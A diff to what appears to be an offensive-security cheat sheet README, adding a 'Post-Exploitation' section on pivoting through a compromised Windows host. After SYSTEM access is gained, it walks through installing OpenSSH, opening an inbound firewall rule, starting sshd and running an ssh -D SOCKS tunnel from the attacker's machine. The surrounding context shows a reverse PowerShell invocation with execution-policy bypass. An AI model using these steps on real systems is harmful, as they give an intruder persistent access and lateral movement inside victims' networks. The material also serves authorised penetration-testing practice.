adding ssh tunnel pivoting

README.md

@@ -522,6 +522,51 @@ function reverse_powershell {
 ```powershell
 powershell -ExecutionPolicy bypass -command "Import-Module reverse.ps1; reverse_powershell"
 ```
+
+##
+
+# Post-Exploitation
+
+## Linux
+
+## Windows
+### Pivoting
+#### Openssh for Tunneling
+
+Once you got SYSTEM on the target machine. download: [openssh_for_windows](https://github.com/PowerShell/Win32-OpenSSH/releases)
+
+```powershell
+powershell -command "Expand-Archive 'C:\<path-to-zipped-openssh>\openssh.zip' c:\<path-to-where-you-whereever-you-want\"
+```
+
+Then install it:
+
+```
+powershell -ExecutionPolicy Bypass -File c:\<path-to-unzipped-openssh-folder>\install-sshd.ps1
+```
+
+Now if you need, just adjust the firewall rules to your needs:
+
+```
+powershell -Command "New-NetFirewallRule -Name sshd -DisplayName 'OpenSSH Server (sshd)' -Enabled True -Direction Inbound -Protocol TCP -Action Allow -LocalPort 22"
+```
+
+Start the sshd service:
+
+```powershell
+net start sshd
+```
+
+After these steps a regular ssh tunnel would sufice:
+
+From your linux machine:
+
+```bash
+$ ssh -ACv -D <tunnel_port> <windows-user>@<windows-ip>
+```
+
+done you have now a socks to tunnel through!!
+
 ##
 
 ### Resources